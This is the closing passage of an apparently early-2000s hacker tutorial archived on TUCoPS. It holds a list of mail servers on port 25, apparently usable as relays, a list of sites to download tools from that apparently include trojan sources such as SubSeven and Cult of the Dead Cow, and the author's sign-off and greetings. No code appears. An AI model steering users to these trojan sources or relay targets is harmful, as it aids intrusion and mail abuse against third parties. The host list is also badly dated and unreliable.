erie.net:25 
voyager.net:25 
awod.com:25 
netforward.com:25 
netcreations.com:25 
mail.wantree.com.au:25 
ns.net:25 
microserve.net:25 
wbs.net:25 
hwg.org:25 
eff.org:25 
europe.std.com:25 
misty.com:25 
succeed.net:25 
mail.discovery.com:25 
cnet.com:25 
nytimes.com:25 
w3.org:25 
mail.audionet.com:25 
mit.edu:25


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 4,D =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Where to get them from:

www.sinred.com
www.tlsecurity.com
www.y3knetwork.org
bionet.tlsecurity.com
www.infernoindustries.cjb.net
www.sub7.slak.org
www.cultdeadcow.com

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 4,E =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Contacting me

Well thats it folks. If ive missed anything thing out, you have some comments, suggestions or death threats :( then
please contact me at etc_passwd01@yahoo.co.uk - I hope its been informative and helpfull, if not just a bit of reading to fill up your spare time and I hope you can use this to have some phun!

g33t$ goto:

D41MG3 - If your still out there - www.acidrox.co.uk
fly_doggz - fdh
binary_fision - liquid_phire
g_h_o_s_t_hax0r 
redhedghog 
and all the other cool peeps ive come accross while I was on my travels.

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

                -=  Copyright 2000 - 2001 =-
               -= expl0it_shad0w of c-cure™ =-
                        -= p£@c£. =-


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH